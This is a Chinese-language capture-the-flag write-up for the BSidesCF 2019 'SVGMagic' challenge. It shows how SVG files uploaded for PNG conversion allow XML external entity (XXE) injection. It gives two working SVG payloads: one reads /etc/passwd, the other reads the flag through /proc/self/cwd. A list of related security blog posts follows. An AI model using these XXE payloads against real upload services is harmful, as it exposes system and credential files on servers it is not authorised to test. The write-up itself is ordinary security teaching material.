[BSidesCF 2019]SVGMagic

打开题目

给了提示,使用魔法将svg转换成png,搜索了一下svg

是一种XML标记语言,既然是XML,就可能存在XXE漏洞

构造一个XML外部实体注入(XXE)攻击,尝试一下

<!ENTITY file SYSTEM "file:///etc/passwd" > 定义一个外部实体 file任意文件读取,读取/etc/passwd用户配置文件

在SVG部分中,&file; 通过文本引用该实体,试图将文件的内容嵌入到SVG输出中。

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE note [

<!ENTITY file SYSTEM "file:///etc/passwd" >

]>

<svg height="300" width="300">

<text x="30" y="30">&file;</text>

</svg>

上传发现可以正常读取

然后构造读取flag

/proc 文件系统:它是一个虚拟文件系统,提供了运行时系统信息,如进程信息、内存状态、系统配置等。

/proc/self:它是指当前正在访问该路径的进程自身。无论哪个进程访问 /proc/self,它总是指向调用者进程的 /proc/[pid] 目录。

cwd:代表"current working directory"(当前工作目录)。当你访问 /proc/self/cwd/ 时,你实际上是在查看当前进程的工作目录。

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE note [

<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >

]>

<svg height="300" width="3000">

<text x="30" y="30">&file;</text>

</svg>

上传得到flag

相关推荐
sublime8832 分钟前
JNPF快速开发平台存在任意文件读取漏洞 附PO
网络·安全·web安全·网络安全
上海云盾商务经理杨杨1 小时前
2026年DDoS攻防新纪元:全面解析攻击的智能化升级与防护的体系化革命
网络·web安全·网络安全·ddos
携欢3 小时前
[特殊字符] 一次经典Web漏洞复现:修改序列化对象直接提权为管理员(附完整步骤)
前端·安全·web安全
Lethehong3 小时前
第二届“启航杯“网络安全挑战赛开始啦!
安全·web安全·ctf·启航杯
lifejump4 小时前
Pikachu | Unsafe Filedownload
前端·web安全·网络安全·安全性测试
zhengfei6114 小时前
【AI工具】——人工智能驱动的自动化网络安全威胁检测平台
人工智能·web安全·自动化
emma羊羊4 小时前
Vulhub-AppWeb
网络·安全·web安全·vulhub
蓝之白15 小时前
流量分析_SnakeBackdoor-6
web安全·ctf·流量分析·逆向分析
白山云北诗21 小时前
企业网站网络安全防护方案
安全·web安全·网络安全·ddos防护·web应用防火墙·cc防护
2301_780789661 天前
服务器感染的病毒有哪些特点呢?
安全·web安全